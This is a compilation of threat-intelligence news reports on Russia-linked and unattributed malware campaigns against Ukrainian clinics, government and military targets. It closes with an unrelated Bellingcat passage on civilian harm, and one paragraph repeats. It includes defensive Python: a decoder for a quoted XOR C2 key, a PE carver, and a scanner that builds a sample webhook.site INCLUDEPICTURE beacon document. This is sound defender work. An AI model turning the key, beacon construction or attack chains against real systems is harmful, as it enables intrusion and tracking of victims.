CERT-UA reports UAC-0247 targeting Ukrainian clinics and government bodies with malware stealing data from Chromium browsers and WhatsApp.
CERT-UA has revealed a cyber campaign by the threat actor UAC-0247 targeting Ukrainian government entities and municipal healthcare facilities, including clinics and emergency hospitals. The operation, conducted between March and April 2026, used malware designed to steal sensitive data from Chromium-based browsers and WhatsApp. The origin of the threat actor remains unclear, raising concerns about ongoing espionage risks.
The attack begins with a phishing email posing as a humanitarian aid proposal, prompting the victim to click a link. To appear credible, attackers may use AI-generated fake websites or exploit legitimate sites vulnerable to XSS attacks.
Clicking the link downloads an archive containing a shortcut file that triggers an HTA execution chain. This retrieves a remote HTA file showing a decoy form while silently launching an EXE via a scheduled task.
The malware injects shellcode into legitimate processes like RuntimeBroker.exe. Recent variants use a two-stage loader with a custom executable format, delivering a compressed and encrypted payload. A reverse shell, often similar to RAVENSHELL, establishes a TCP connection with the command server, encrypts traffic via XOR, and executes commands.
“A typical TCP reverse shell or an analogue classified as RAVENSHELL can be used as stagers, which provides for establishing a TCP connection with the management server, encrypting traffic using 9-byte XOR (key: “01 01 02 03 74 15 04 FF EE”; during the first connection, an XOR-encrypted message “Connected!” is transmitted), as well as executing commands using CMD.” reads the report published by CERT-UA.
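The 9-byte repeating XOR described in the quote above, written out as an added example (not CERT-UA's code) so that an analyst can decode a captured stream and check it for the encoded "Connected!" hello. The key is the one quoted in the report; whether the keystream restarts for every message is not stated, so the detector tries every key alignment.

```python
"""Added example (not from the CERT-UA report): 9-byte repeating XOR as
described for the UAC-0247 stager, plus a detector for its 'Connected!'
first-connection message."""
from typing import Optional

# Key quoted in the CERT-UA report: 01 01 02 03 74 15 04 FF EE
RAVENSHELL_KEY = bytes.fromhex("01 01 02 03 74 15 04 FF EE")
HELLO = b"Connected!"


def xor_stream(data: bytes, key: bytes = RAVENSHELL_KEY, offset: int = 0) -> bytes:
    """XOR data with a repeating key. XOR is symmetric, so the same call
    encrypts and decrypts. `offset` selects where in the key the keystream
    starts (0 if the key restarts for every message, which is an assumption)."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ key[(i + offset) % len(key)] for i, b in enumerate(data))


def find_hello(payload: bytes, key: bytes = RAVENSHELL_KEY) -> Optional[int]:
    """Return the byte offset of the XOR-encoded 'Connected!' banner inside a
    captured TCP payload, or None if absent. Every key alignment is tried,
    since the report does not say whether the keystream restarts per message."""
    for key_offset in range(len(key)):
        needle = xor_stream(HELLO, key, key_offset)
        idx = payload.find(needle)
        if idx != -1:
            return idx
    return None


# Constructed sample: two bytes of preceding traffic, then the hello encoded
# with a keystream that started at the beginning of the stream (offset 2).
SAMPLE_PAYLOAD = b"\x00\x00" + xor_stream(HELLO, RAVENSHELL_KEY, 2)

if __name__ == "__main__":
    print("encoded hello:", xor_stream(HELLO).hex(" "))
    print("hello found at offset:", find_hello(SAMPLE_PAYLOAD))
```

The encoded banner contains non-printable bytes (0x11, 0x9a, 0x8a), which is what makes it usable as a network signature.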
For persistence, the attackers deployed the malware AGINGFLY alongside a PowerShell script, SILENTLOOP, which manages commands, updates configuration, and retrieves C2 server data via Telegram with backup mechanisms.
AGINGFLY is a C# malware used to remotely control infected computers. It can run commands, download files, take screenshots, log keystrokes, and execute code. It communicates with its control server via encrypted web sockets using AES-CBC. Unlike typical malware, it doesn’t store command functions locally, instead, it downloads them from the server and compiles them on the fly, making it more flexible and harder to detect.
CERT-UA experts analyzed multiple incidents, discovering that attackers stole credentials from browsers using CHROMELEVATOR and from WhatsApp via ZAPIXDESK, while also conducting reconnaissance and lateral movement within networks. They employ subnet scanners and tools like RUSTSCAN, and create covert tunnels using LIGOLO-NG and CHISEL. In one case, an XMRIG miner was deployed via a modified WIREGUARD executable. Targets include Ukrainian Defense personnel, with malware spread through a fake “BACHU” tool shared on Signal, leveraging DLL side-loading to deploy AGINGFLY.
“To reduce the likelihood of a cyberthreat, it is enough to limit the launch of LNK, HTA, and JS files, as well as legitimate utilities mshta.exe, powershell.exe, and wscript.exe, the necessity of which has been repeatedly emphasized in the context of reducing the attack surface by using standard operating system protection mechanisms.” concludes the report.
Ukrainian cyber defenders reported a newly intensified cyber campaign that is targeting Ukraine’s healthcare system and local government agencies, with attackers deploying increasingly sophisticated malware and social engineering tactics.
In a fresh advisory, CERT-UA said the activity—linked to a threat cluster tracked as UAC-0247—spiked between March and April 2026, with clinical hospitals, emergency services, and municipal bodies bearing the brunt of the attacks.
UAC-0247 Used Humanitarian Aid Lures as Entry Point
The campaign begins with phishing emails disguised as offers of humanitarian assistance—a tactic designed to exploit trust during wartime conditions. Victims are urged to click on links that appear legitimate, sometimes backed by convincingly crafted fake websites or compromised third-party resources.
Behind the scenes, however, the links trigger a multi-stage infection chain that ultimately gives attackers remote control over the victim’s system.
Once clicked, victims download an archive containing a malicious shortcut file. This file activates a built-in Windows tool to execute remote code, initiating a sequence that includes decoy documents to avoid suspicion.
The attack escalates quickly. Malicious executables are deployed via scheduled tasks, injecting code into legitimate system processes such as RuntimeBroker.exe to evade detection.
Recent campaigns show an evolution in sophistication, with attackers introducing multi-stage loaders and custom executable formats. Payloads are often encrypted and compressed, making analysis and detection more difficult.
At later stages, attackers deploy reverse shell tools—including variants resembling “RAVENSHELL”—to establish encrypted communication with command-and-control servers and execute remote commands.
Persistent Access and Remote Control
To maintain long-term access, attackers install a custom backdoor known as AGINGFLY, a C#-based malware designed for full remote system control. The tool enables command execution, file downloads, screenshot capture, keystroke logging, and execution of additional code.
Unlike conventional malware, AGINGFLY dynamically retrieves and compiles its command logic from remote servers, making it more adaptable and harder to detect.
Complementing this is a PowerShell-based tool dubbed SILENTLOOP, which helps maintain persistence and retrieves command server addresses—sometimes even pulling them from Telegram channels.
Credential Theft and Lateral Movement
Once inside a network, attackers move quickly to expand access. CERT-UA observed tools like CHROMELEVATOR being used to extract browser credentials, while ZAPIXDESK targets WhatsApp data.
The attackers also conduct internal reconnaissance using both custom scripts and publicly available tools such as RUSTSCAN. For stealthy movement across networks, tunneling tools like LIGOLO-NG and CHISEL are deployed.
In at least one case, attackers went further—embedding the XMRIG cryptocurrency miner inside a modified version of the legitimate WireGuard application, highlighting a secondary motive of financial gain.
Military Targets Also in Scope
The campaign isn’t limited to civilian infrastructure. CERT-UA noted an incident in March where individuals connected to Ukraine’s defense sector were targeted via the Signal platform.
Attackers distributed a trojanized version of software used by FPV drone operators, packaged as a seemingly legitimate update. In reality, the download triggered a DLL side-loading attack that installed the AGINGFLY backdoor.
CERT-UA recommends reducing exposure by restricting the execution of high-risk file types such as LNK, HTA, and JavaScript files. The agency also urges organizations to limit the use of native Windows tools like mshta.exe and PowerShell where possible, as these are frequently abused in attacks.
APT28 targets Ukraine and allies with PRISMEX malware, using stealthy techniques for espionage and command-and-control.
Russia-linked group APT28 (aka UAC-0001, aka Fancy Bear, Pawn Storm, Sofacy Group, Sednit, BlueDelta, and STRONTIUM) is running a spear-phishing campaign against Ukraine and its allies, deploying a new malware suite called PRISMEX. Active since September 2025, the campaign uses advanced stealth techniques like steganography and COM hijacking, and targets defense systems and aid infrastructure to support long-running espionage operations.
The Russian cyber espionage group remains highly aggressive, quickly weaponizing newly disclosed flaws like CVE-2026-21509 to target government, military, and critical infrastructure in Central and Eastern Europe. Its latest campaign uses the PRISMEX malware suite, combining a dropper, loader, and implant based on the Covenant framework to enable stealthy, fileless attacks and encrypted command-and-control.
The operation shows advanced preparation and links to past activity, focusing on Ukraine’s defense supply chain, including allies, transport, and aid networks. Researchers believe this marks an evolution of the NotDoor ecosystem, expanding capabilities for rapid exploitation and long-term espionage.
The attack chain starts with spear-phishing emails themed around military training, weather alerts, or weapon smuggling. Victims who open the attached RTF file trigger exploitation of CVE-2026-21509, which bypasses security controls and forces the system to connect to an attacker-controlled WebDAV server. This automatically retrieves and executes a malicious LNK file without further user interaction.
The LNK file may then exploit CVE-2026-21513 to bypass browser protections and execute code silently, downloading additional payloads. This suggests a possible two-stage attack chain designed for stealth and reliability.
“TrendAI Research has tracked Pawn Storm’s activities across three distinct but interconnected campaigns, each building upon its previous infrastructure and tooling.” reads the report published by Trend Micro. “The timeline of this campaign indicates advanced knowledge of multiple vulnerabilities:
CVE-2026-21509: Domain registration for WebDAV servers began on January 12, 2026, exactly two weeks prior to the public disclosure on January 26.
CVE-2026-21513: The LNK exploit sample appeared on VirusTotal on January 30, 2026, while Microsoft’s patch was not released until February 10, 2026. This 11-day gap confirms zero-day exploitation in the wild.
This pattern suggests Pawn Storm had access to vulnerability details ahead of public disclosure.”
From there, the infection can follow different paths, including deployment of the PRISMEX malware suite. PRISMEX components, such as PrismexSheet, PrismexDrop, PrismexLoader, and PrismexStager, use techniques like steganography, COM hijacking, and abuse of cloud services for command-and-control. These methods enable fileless execution, persistence, and evasion of modern security tools, allowing attackers to maintain long-term access and conduct espionage operations.
The researchers detailed decoy documents and targeting, such as malicious Excel files showing realistic decoy content once macros are enabled, including Ukrainian drone inventories, supplier price lists, and military logistics forms.
These themes clearly target Ukrainian drone units and logistics staff. The upload data suggests victims across key regions like Kyiv and Kharkiv, indicating a focus on both frontline and command structures.
PrismexDrop is a native dropper that prepares the system by decrypting payloads, dropping files, and ensuring persistence via COM hijacking and a scheduled task that restarts explorer.exe. This allows the malware to run within a trusted process, improving stealth and reliability.
PrismexLoader is a loader that acts as a proxy DLL, executing malicious code while mimicking legitimate system behavior. It uses a custom “Bit Plane Round Robin” steganography method to extract hidden payloads from images, spreading data across the file to evade detection. The payload is then executed entirely in memory using .NET runtime loading, leaving minimal traces on disk.
The final component, PrismexStager, connects to command-and-control servers via Filen.io cloud services. This helps attackers blend malicious traffic with normal encrypted communications, making detection harder while enabling data exfiltration and remote control.
“The payload extracted from the image is the Covenant Grunt Stager, which we have internally tracked as PrismexStager. This is a .NET assembly responsible for C&C and executing further tasks from the Covenant framework. It is heavily obfuscated with randomized function names to hinder static analysis.” states the report. “The malware abuses the legitimate end-to-end encrypted cloud storage service Filen.io for C&C communications. By leveraging this trusted service, the malicious traffic blends in with normal encrypted web traffic, effectively bypassing reputation-based filtering and firewall rules.”
The campaign shows a clear strategy: disrupt Ukraine’s supply chain and operational planning, while extending access to NATO-linked logistics. Targets include the Ukrainian government, defense, emergency services, and hydrometeorology, critical for drone and artillery operations, as well as hubs in Poland, Romania, Slovakia, and others supporting military aid flows.
TrendAI attributes the activity to the APT28 group with high confidence, based on consistent tools, infrastructure, and behavior. Unique elements like the custom steganography method, MiniDoor/NotDoor malware lineage, use of Covenant, and COM hijacking reinforce this link, along with reused infrastructure and rapid exploitation of vulnerabilities.
The operation reflects a shift toward tactical disruption rather than pure espionage. By targeting weather data, transport networks, and aid organizations, attackers aim to map and potentially sabotage support to Ukraine. The presence of destructive capabilities alongside espionage tools highlights the dual-use nature of the campaign, enabling both intelligence gathering and potential disruptive attacks aligned with military objectives.
“The technical links between the PRISMEX components and previous campaigns demonstrate the threat actor’s continuous development cycle and modular approach to capability building. Organizations in the targeted geographic and industry sectors should consider themselves at elevated risk and implement the countermeasures detailed above immediately.” concludes the report. “The use of newly disclosed vulnerabilities and legitimate cloud services makes detection challenging. Defenders must adopt an “assume breach” mentality and focus on behavioral anomalies rather than just static indicators.”
Threat actors impersonated CERT-UA to send phishing emails with AGEWHEEZE malware, tricking victims into installing a fake “security tool.”
A threat actor, tracked as UAC-0255, impersonated CERT-UA in a phishing campaign, sending emails to about 1 million users. The messages urged victims to download a password-protected archive from Files.fm and install a fake “specialized software,” which actually deployed the AGEWHEEZE remote access tool, giving attackers control over infected systems.
“The National Cyber Incident, Cyber Attack, and Cyber Threat Response Team CERT-UA recorded cases of distribution of emails allegedly on behalf of CERT-UA on March 26-27, 2026, urging people to download a password-protected archive (“CERT_UA_protection_tool.zip”, “protection_tool.zip”) from the Files.fm service and install “specialized software”.” reads the advisory published by CERT-UA. “It was found that the executable file that was offered to be installed (internal package name: “/example.com/tvisor/agent”) is a multifunctional software tool for remote computer control, classified by CERT-UA as AGEWHEEZE.”
AGEWHEEZE supports command execution, file management, screen capture, input control, and process/service management. It ensures persistence via registry, startup, or scheduled tasks, installing itself in AppData paths. The malware communicates with its server via WebSockets and can also steal clipboard data, run commands, and control system actions.
The campaign targeted government organizations, medical centers, security companies, educational institutions, financial institutions, software development companies, and others.
The attackers created a fake website (cert-ua[.]tech) mimicking the real CERT-UA site to spread the fake “security tool” that is actually AGEWHEEZE malware. The tool allows remote control of infected systems. CERT-UA experts state that the command server is hosted on OVH infrastructure and includes a login page (“The Cult”) with Russian-language elements, suggesting the attackers’ origin or links.
The fake site cert-ua[.]tech includes links to a Telegram channel claiming responsibility for the attack, confirming attribution to UAC-0255.
The fake site was likely AI-generated and included references to “CYBER SERP,” a group active since late 2025, claiming responsibility. The group says it sent phishing emails to 1 million users and infected over 200,000 devices, though this is unverified.
The campaign had a limited impact, infecting only a few devices in educational institutions. CERT-UA experts helped contain it. The case shows how AI can make cyberattacks easier, and highlights the need to reduce attack surfaces and use security tools like AppLocker and system protections.
Authorities thanked Ukrainian telecom providers for supporting cyber defense efforts and sharing threat information. They also warned that AI is making attacks easier, urging organizations to reduce attack surfaces and strengthen security using system protections and dedicated tools.
APT28 used BEARDSHELL and COVENANT malware to spy on Ukrainian military personnel, enabling long-term surveillance since April 2024.
The Russia-linked group APT28 (aka UAC-0001, aka Fancy Bear, Pawn Storm, Sofacy Group, Sednit, BlueDelta, and STRONTIUM) has used BEARDSHELL and COVENANT malware to conduct long-term surveillance of Ukrainian military personnel. According to ESET, the campaign began in April 2024 and relies on custom implants designed to maintain persistent access and collect sensitive information from targeted systems.
“Since April 2024, Sednit’s advanced development team has reemerged with a modern toolkit centered on two paired implants, BeardShell and Covenant, each using a different cloud provider for resilience.” reads the report published by ESET. “This dual‑implant approach enabled long‑term surveillance of Ukrainian military personnel. Interestingly, these current toolsets show a direct code lineage to the group’s 2010‑era implants.”
The APT28 group has been active since at least 2007 and has targeted governments, militaries, and security organizations worldwide. The group was also involved in the string of attacks that targeted the 2016 Presidential election.
The group operates out of military unit 26165 of the Russian General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS).
BEARDSHELL and SLIMAGENT are two advanced malware tools written in C++. BEARDSHELL downloads, decrypts (using ChaCha20-Poly1305), and runs PowerShell scripts, sending results via the Icedrive API. It creates a unique folder on each infected machine based on system identifiers. SLIMAGENT captures screenshots using Windows APIs, encrypts them with AES and RSA, and stores them locally with timestamped filenames. Both tools are stealthy, use strong encryption, and exploit legitimate cloud services to avoid detection, highlighting modern APT tactics.
“SlimAgent includes several features that were absent from the 2018 samples, such as encryption of the collected logs. Nevertheless, it is remarkable that samples deployed six years apart exhibit such strong code similarities.” continues the report. “We therefore assess with high confidence that both the 2018 samples and the 2024 SlimAgent sample were built from the same codebase.”
Figure: Code comparison between SlimAgent (left) and Xagent (right)
In May 2025, ESET researchers reported unauthorized access to an email account in the Ukrainian government’s gov.ua domain. CERT-UA, in collaboration with the Cybersecurity Center of Military Unit A0334, responded to the incident.
Analysis shows that SLIMAGENT likely evolved from the XAgent keylogger long used by APT28. Researchers found strong code similarities, including identical keylogging logic and HTML-based logging with the same color scheme for captured data. Evidence suggests SLIMAGENT has been deployed as a standalone espionage tool since at least 2018. Despite XAgent’s well-known codebase, the group continues reusing and adapting it, alongside newer malware like BEARDSHELL, in recent espionage campaigns.
During forensic analysis, the researchers discovered malware linked to the COVENANT framework and the BEARDSHELL backdoor. The experts were not able to determine the initial infection vector.
ESET noted that BEARDSHELL uses a rare obfuscation method called opaque predicate, previously seen in XTunnel, a tool used by APT28 during the Democratic National Committee hack. This link strongly suggests BEARDSHELL belongs to the group’s toolkit. Another tool, COVENANT, has been heavily modified to support long-term espionage and uses cloud services like Filen for command-and-control communications.
The cybersecurity firm reports that developers behind APT28 have developed strong expertise in the Covenant framework, despite its official development ending in 2021. The group has successfully adapted and reused the tool for several years, particularly in espionage operations targeting Ukrainian organizations.
“We have shown that Sednit’s advanced development team is active once again, operating an arsenal centered on two implants – BeardShell and Covenant – deployed in tandem and each leveraging a different cloud provider.” concludes the report. “The sophistication of BeardShell and the extensive modifications made to Covenant demonstrate that Sednit’s developers remain fully capable of producing advanced custom implants. Furthermore, the shared code and techniques linking these tools to their 2010-era predecessors strongly suggest continuity within the development team.”
Recently, ClearSky researchers reported a phishing campaign linked to Russia that targets Ukrainian organizations using two new malware families, BadPaw and MeowMeow. The attack chain begins with a phishing email carrying a link to a ZIP archive. When opened, an HTA file displays a Ukrainian-language lure about border crossing appeals while secretly launching the infection chain.
Researchers uncovered a Russian campaign targeting Ukrainian entities with new malware families BadPaw and MeowMeow delivered through phishing emails.
Researchers reported a phishing campaign linked to Russia that targets Ukrainian organizations using two new malware families, BadPaw and MeowMeow. The attack chain begins with a phishing email carrying a link to a ZIP archive. When opened, an HTA file displays a Ukrainian-language lure about border crossing appeals while secretly launching the infection chain.
“The attack chain initiates with a phishing email containing a link to a ZIP archive. Once extracted, an initial HTA file displays a lure document written in Ukrainian concerning border crossing appeals to deceive the victim.” reads the report published by ClearSky. “Simultaneously, the infection triggers the download of BadPaw, a .NET-based loader. Upon establishing command-and-control (C2) communication, the loader deploys MeowMeow, a sophisticated backdoor.”
Researchers found that both malware strains use the .NET Reactor packer to make the analysis and reverse engineering harder, showing the attackers’ intent to evade detection and maintain long-term persistence.
“An additional layer of defense employed by BadPaw is the use of .NET Reactor, a commercial protection and obfuscation tool for .NET assemblies. This packer obfuscates the underlying code to hinder static analysis and reverse engineering.” continues the report.
The malware also includes multiple defense mechanisms. Its components stay inactive unless launched with specific parameters, otherwise displaying a benign interface and executing harmless code.
The MeowMeow backdoor adds environmental checks, scanning systems for virtual machines and analysis tools such as Wireshark, ProcMon, and Fiddler. If it detects a sandbox or research environment, it immediately stops execution to avoid investigation.
Researchers at ClearSky attribute the campaign with high confidence to a Russia-linked cyberespionage group and with lower confidence to the threat actor APT28. Their assessment relies on three factors: the targeting of Ukrainian entities, Russian-language artifacts in the code, and tactics consistent with previous Russian cyber operations, including multi-stage infection chains and .NET-based loaders.
In parallel, the attack chain leads to the deployment of a .NET-based loader called BadPaw, which then establishes communication with a remote server to fetch and deploy a sophisticated backdoor called MeowMeow.
The campaign has been attributed with moderate confidence to the Russian state-sponsored threat actor known as APT28, based on the targeting footprint, the geopolitical nature of the lures used, and overlaps with techniques observed in previous Russian cyber operations.
ClearSky’s research details outline a multi-stage infection chain beginning with a phishing email sent via the Ukrainian provider ukr[.]net, a service previously abused in Russian campaigns. The email contains a link that first loads a tracking pixel to notify attackers when a victim clicks, then redirects to a shortened URL that downloads a ZIP archive.
Inside the archive is a disguised HTA file posing as an HTML document. When executed, it opens a decoy document about a Ukrainian border-crossing appeal while silently launching the malicious routine. The HTA performs anti-analysis checks by verifying the system’s installation date and aborting execution on recently installed systems, a common sandbox-evasion tactic.
“The dropped decoy document serves as a social engineering tactic, presenting a confirmation of receipt for a government appeal regarding a Ukrainian border crossing. This lure is intended to maintain the veneer of legitimacy while the HTA file executes its secondary stages in the background.” continues the report. “To evade detection and identify potential sandbox environments, the HTA file performs an environmental check by inspecting the following Registry key: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\InstallDate. By querying this value, the malware calculates the “age” of the operating system. If the system was installed less than ten days prior to execution, the malware terminates. This is a common anti-analysis technique used to avoid execution on freshly provisioned virtual machines or automated analysis sandboxes.”
If conditions are met, it searches for the original archive, extracts additional components, and establishes persistence through a scheduled task. A VBS script then retrieves hidden payload data embedded within an image using steganography, extracting a PE file that researchers identified as the BadPaw loader, which ultimately deploys the MeowMeow backdoor and establishes command-and-control communication.
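A triage helper for the image-carried PE stage described above, written as an added example (not ClearSky's code). It assumes the simplest storage scheme, a PE stored contiguously somewhere inside the image container (for instance appended after the JPEG end-of-image marker); a bit-level steganographic scheme would need its own decoder. The JPEG and PE bytes in the sample are constructed.

```python
"""Added example (not from the ClearSky report): locate a PE file embedded
contiguously inside an image blob, as a first check on images pulled from
an infection chain like the one described for BadPaw."""
import struct
from typing import List, Tuple


def find_embedded_pe(blob: bytes) -> List[Tuple[int, int]]:
    """Return (mz_offset, pe_header_offset) for every plausible PE in `blob`.
    A hit requires the 'MZ' DOS stub, an e_lfanew (DWORD at MZ+0x3C) that
    points inside the blob, and the 'PE\\0\\0' signature at that position.
    Checking the signature avoids false hits on a stray 'MZ' in pixel data."""
    hits: List[Tuple[int, int]] = []
    pos = blob.find(b"MZ")
    while pos != -1:
        if pos + 0x40 <= len(blob):  # full DOS header must fit
            e_lfanew = struct.unpack_from("<I", blob, pos + 0x3C)[0]
            pe = pos + e_lfanew
            if 0x40 <= e_lfanew < 0x1000 and pe + 4 <= len(blob) \
                    and blob[pe:pe + 4] == b"PE\x00\x00":
                hits.append((pos, pe))
        pos = blob.find(b"MZ", pos + 1)
    return hits


def carve_pe(blob: bytes, mz_offset: int) -> bytes:
    """Carve from the DOS stub to the end of the blob. The true length would
    come from the section table; end-of-file is enough for a triage copy."""
    return blob[mz_offset:]


def _constructed_pe_stub() -> bytes:
    """Constructed minimal PE: DOS header with e_lfanew = 0x40, followed by
    the PE signature and a COFF header marked as i386 (0x014C)."""
    dos = bytearray(b"MZ" + b"\x00" * 0x3E)
    struct.pack_into("<I", dos, 0x3C, 0x40)
    coff = b"\x4c\x01" + b"\x00" * 18
    return bytes(dos) + b"PE\x00\x00" + coff


# Constructed sample: JPEG SOI/APP0 markers, padding, EOI, then the PE stub.
SAMPLE_IMAGE = b"\xff\xd8\xff\xe0" + b"\x00" * 32 + b"\xff\xd9" + _constructed_pe_stub()

if __name__ == "__main__":
    for mz, pe in find_embedded_pe(SAMPLE_IMAGE):
        print(f"PE found: MZ at {mz}, PE header at {pe}, "
              f"{len(carve_pe(SAMPLE_IMAGE, mz))} bytes carved")
```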
Researchers found Russian-language strings in the malware code, including one indicating the time needed to reach an operational state. These artifacts suggest a Russian origin and may reflect an OPSEC mistake or leftover development elements not adapted for Ukrainian targets.
“The presence of these Russian-language strings suggests two possibilities: the threat actor committed an operational security (OPSEC) error by failing to localize the code for the Ukrainian target environment, or they inadvertently left Russian development artifacts within the code during the malware’s production phase.” concludes the report.
Russia-linked APT28 targeted European entities with a webhook-based macro malware campaign called Operation MacroMaze.
Russia-linked APT28 (aka UAC-0001, aka Fancy Bear, Pawn Storm, Sofacy Group, Sednit, BlueDelta, and STRONTIUM) launched Operation MacroMaze, targeting select entities in Western and Central Europe from September 2025 to January 2026. The campaign used webhook-based macro malware, leveraging simple tools and legitimate services for infrastructure and data exfiltration.
The attack chain begins with spear-phishing emails delivering weaponized documents that contain an “INCLUDEPICTURE” field pointing to a webhook[.]site URL hosting a JPG.
“All analyzed documents share a common structural element within their XML: an INCLUDEPICTURE field referencing a remote URL hosted on webhook[.]site.” reads the report published by S2 Grupo’s LAB52 threat intelligence team. “This field is embedded in the document’s XML (w:instrText) and instructs Microsoft Word to retrieve an external image resource when the field is evaluated. The referenced file (docopened.jpg) is fetched from the remote server when the document is opened and fields are updated. This behavior functions as a tracking mechanism: when the document is opened and Word processes the INCLUDEPICTURE field, an outbound HTTP request is generated to the remote server. The server operator can then log metadata associated with the request, effectively confirming that the document has been opened.”
When opened, the file silently retrieves the image, acting like a tracking pixel that alerts attackers the document was viewed. Variants seen between September 2025 and January 2026 use modified macros to drop malware and deploy additional payloads on compromised systems.
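A scanner for the INCLUDEPICTURE beacon described above, added here as an example and not part of LAB52's report. It opens a .docx as the ZIP it is, joins the w:instrText runs of each paragraph (Word splits one field instruction across several runs), and reports every INCLUDEPICTURE that points at a remote URL, flagging webhook.site hosts. The sample document and its PLACEHOLDER-ID path are constructed.

```python
"""Added example (not from the LAB52 report): flag Word documents whose
field instructions (w:instrText) contain an INCLUDEPICTURE pointing at a
remote URL, the open-tracking beacon used in Operation MacroMaze."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from typing import List, Tuple
from urllib.parse import urlparse

W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
INCLUDEPICTURE_RE = re.compile(r'INCLUDEPICTURE\s+"?(https?://[^\s"]+)', re.IGNORECASE)
# Hosts that warrant an alert on their own; webhook.site is the one in the report.
SUSPICIOUS_HOSTS = ("webhook.site",)


def field_instructions(part_xml: bytes) -> List[str]:
    """Join the w:instrText runs of each paragraph into one instruction string."""
    root = ET.fromstring(part_xml)
    out = []
    for para in root.iter(f"{{{W_NS}}}p"):
        runs = [t.text or "" for t in para.iter(f"{{{W_NS}}}instrText")]
        if runs:
            out.append("".join(runs))
    return out


def scan_docx(docx_bytes: bytes) -> List[Tuple[str, str, bool]]:
    """Return (url, host, flagged) for every remote INCLUDEPICTURE in the
    document body, headers and footers. flagged is True for beacon hosts."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        parts = [n for n in zf.namelist() if n.startswith("word/") and n.endswith(".xml")]
        for name in parts:
            for instr in field_instructions(zf.read(name)):
                for match in INCLUDEPICTURE_RE.finditer(instr):
                    url = match.group(1)
                    host = urlparse(url).hostname or ""
                    flagged = any(host == h or host.endswith("." + h) for h in SUSPICIOUS_HOSTS)
                    findings.append((url, host, flagged))
    return findings


def build_docx(instr_runs: List[str]) -> bytes:
    """Constructed minimal .docx with one paragraph holding one field whose
    instruction is split across the given w:instrText runs."""
    runs = "".join(
        f'<w:r><w:instrText xml:space="preserve">{r}</w:instrText></w:r>' for r in instr_runs
    )
    doc = (
        f'<?xml version="1.0" encoding="UTF-8"?>'
        f'<w:document xmlns:w="{W_NS}"><w:body><w:p>'
        f'<w:r><w:fldChar w:fldCharType="begin"/></w:r>{runs}'
        f'<w:r><w:fldChar w:fldCharType="end"/></w:r>'
        f'</w:p></w:body></w:document>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", doc)
    return buf.getvalue()


# Constructed beacon document: the URL path uses an obvious placeholder id.
SAMPLE_DOCX = build_docx([
    ' INCLUDEPICTURE "https://webhook.site/',
    'PLACEHOLDER-ID/docopened.jpg" \\d ',
])
BENIGN_DOCX = build_docx([" PAGE "])

if __name__ == "__main__":
    for url, host, flagged in scan_docx(SAMPLE_DOCX):
        print(f"{'ALERT' if flagged else 'info'}: remote INCLUDEPICTURE -> {url} ({host})")
```

Any remote INCLUDEPICTURE is worth reviewing even when the host is not on the list, since the same field works with any attacker-controlled server.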
Researchers identified four closely related macro variants acting as droppers. Each drops six files (VBS, BAT, CMD, HTM, XHTML) into the %USERPROFILE% folder using GUID-like names tied to a webhook[.]site C2 path. The attackers used heavy string concatenation to hide key commands. The macro launches a VBScript that triggers multi-stage execution, creates a Scheduled Task for persistence, then deletes traces. Over time, the variants evolved from simple document cleanup to fake Word error messages and SendKeys-based UI manipulation to bypass security prompts. Two batch versions follow: one uses Edge in headless mode for stealth, the other hides the browser off-screen and forcefully kills processes for reliability, suppressing certificate errors.
“The final HTML file is constructed by concatenating a static HTM file, the captured output of the reconstructed CMD payload, and a closing XHTML template. The initial HTM file defines an auto-submitting form that sends a POST request to a webhook[.]site endpoint, while the payload output is embedded directly within a element. The closing XHTML fragment completes the document structure.” continues the report. “When the resulting HTML file is rendered by Microsoft Edge, the form is submitted, causing the collected command output to be exfiltrated to the remote webhook endpoint without user interaction.”
The Operation MacroMaze campaign uses a browser-based exfiltration method that relies on standard HTML features to send stolen data while leaving minimal traces on disk. Although the specific command file used to gather system data was not recovered, similar operations previously attributed to APT28 by CERT Polska and the Computer Emergency Response Team of Ukraine suggest this stage likely deploys a lightweight reconnaissance script, collecting basic host details such as IP address, directory listings, and system environment information before exfiltration.
“This campaign proves that simplicity can be powerful. The attacker uses very basic tools (batch files, tiny VBS launchers and simple HTML) but arranges them with care to maximise stealth.” concludes the report. “The tooling may be unsophisticated, but the operational tradeoffs are effective. It’s low-tech executed with high craft, which makes detection and attribution harder than the artifacts alone would suggest.”
In January 2026, Zscaler ThreatLabz uncovered the campaign Operation Neusploit targeting Central and Eastern Europe. The threat actors exploited the vulnerability CVE-2026-21509, using weaponized RTF files and localized lures to deploy MiniDoor, PixyNetLoader, and Covenant Grunt implants.
In the tiny town of Krasnopillia in rural Ukraine, the stillness of the night is shattered by the whine of a Russian drone. Seconds later, a community hospital bursts into flames. Sparks and debris rain down across the skeletons of trees as the fire sends plumes of smoke into the pitch-black sky.
Dozens of people are evacuated, according to local media reports – but as rescuers respond, in what appears to be a double-tap strike, Russian forces hit a shelter where more than 20 patients are huddled, including some with limited mobility.
The strike in March 2025 comes just hours after a larger regional hospital in the northeastern Sumy governorate is targeted, decimating the primary health facilities serving the small town of Krasnopillia, whose prewar population was around 7,700. Healthcare services for the town “practically ceased” in the wake of the strikes, Olena Pryima, a local school director, told Bellingcat in a phone interview.
“[The Russians] destroy the infrastructure so that people do not have the opportunity to live and exist normally. You cannot consult a doctor, nothing,” she said. “And now these people who remain, God forbid, the ambulance will not go there, just because the security situation does not allow it.”
Her own school was among the many buildings destroyed in Russian strikes, and she says it has been impossible to rebuild amid the ongoing war. “We try to heat some accommodations, in spite of everything … especially since this winter is very difficult,” Pryima said. “But we are not talking about rebuilding at all now. We have hope; we are collecting some documents [such as testimonies and damage assessments], since this will end someday – and then we can rebuild something.”
For the past four years, Bellingcat has been documenting and verifying incidents such as these, chronicling the extensive damage to civilian life and infrastructure since Russia's full-scale invasion began in February 2022.
In over 2,500 cases of civilian harm that we have verified – the vast majority of which occurred on Ukrainian territory, although dozens also took place in Russia – more than 1,100 residential structures were hit. Hundreds of other civilian sites such as schools, playgrounds, fire stations, hospitals, churches, cultural centres, museums, businesses and farms have been impacted too.
